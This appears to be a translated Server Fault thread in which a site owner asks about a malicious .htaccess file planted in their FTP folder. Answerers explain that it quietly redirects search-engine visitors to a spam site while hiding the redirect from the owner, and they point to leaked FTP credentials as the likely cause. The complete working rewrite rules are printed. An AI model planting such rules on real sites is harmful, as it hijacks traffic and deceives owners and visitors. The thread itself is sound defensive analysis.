File .htaccess yang mencurigakan

20

Ini diunggah ke salah satu folder FTP saya. Saya tidak terbiasa dengan Apache, tetapi masih ingin tahu - dapatkah seseorang memberi tahu saya apa jenis tindakan pengecut yang coba dilakukan oleh file ini? Terima kasih!

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]
apache-2.2  security  mod-rewrite  .htaccess 
ovinofil
sumber
1
BAGUS! (Dengan cara yang jahat ...) Pada dasarnya membawa semua orang yang datang ke situs Anda dari mesin pencari dan mengarahkan mereka ke SPAMMER.info
KPWINC
Pernahkah ini terjadi padaku sekali. The .htaccessFile ditambahkan ke situs saya memiliki sekitar 40 baris kosong di bagian atas, hanya untuk membingungkan saya lebih lanjut.
TRiG

Jawaban:

15

Yang mengirim pengguna yang berasal dari mesin pencari ke situs terakhir SPAMMER.info(lihat riwayat pertanyaan untuk situs yang sebenarnya ).

Tampaknya perujuk dalam upaya untuk bersembunyi dari Anda , karena Anda kemungkinan tidak mengakses situs melalui mesin pencari. Artinya, jika Anda langsung menuju ke URL, semuanya tampak normal. Namun, jika Anda masuk melalui mesin pencari, Anda akan dialihkan.

Catatan: ini tidak memengaruhi perayap web karena mereka ( setidaknya googlebot ) tidak menyetel tajuk pengarah.

Michael Haren
sumber
8

Setiap kali pengguna dari mesin pencari halaman di situs Anda, mereka akan diarahkan ke situs spam .info.

Ini sangat licik - Anda tidak akan melihat ada masalah karena biasanya Anda cukup mengetikkan alamatnya.

Greg
sumber
1
Karena sedang melihat pengarah, bukankah akan mengarahkan ulang klik yang datang melalui mesin pencari?
Apakah itu tidak memengaruhi tautan dari Google juga? Misalnya, Anda mencari situs OP di Google, klik di situ dan Anda diarahkan sejak Anda berasal dari Google?
Ya, Tautan dari mesin pencari saja (seperti yang saya katakan dalam jawaban saya) tetapi bukan crawler mesin / bot. Jawaban ini telah diperbarui sehingga sekarang benar. Ini awalnya menunjukkan bahwa ini hanya berlaku untuk bot.
Michael Haren
1

untuk menambah lebih banyak - kemungkinan besar kredensial ftp Anda bocor. mungkin Anda menyimpannya di filezilla / total commander dll. ada banyak malware yang mencuri dan kemudian 'berkeliling' - masuk ke akun ftp, melampirkan javascript berbahaya ke index.php / html atau meletakkan file penulisan ulang yang serupa.

pQd
sumber
Saya menghadapi masalah ini. Hari demi hari .htaccess file lainnya dimodifikasi yang mengakibatkan kesalahan server internal.
vnix27
Dengan menggunakan situs kami, Anda mengakui telah membaca dan memahami Kebijakan Cookie dan Kebijakan Privasi kami.
Licensed under cc by-sa 3.0 with attribution required.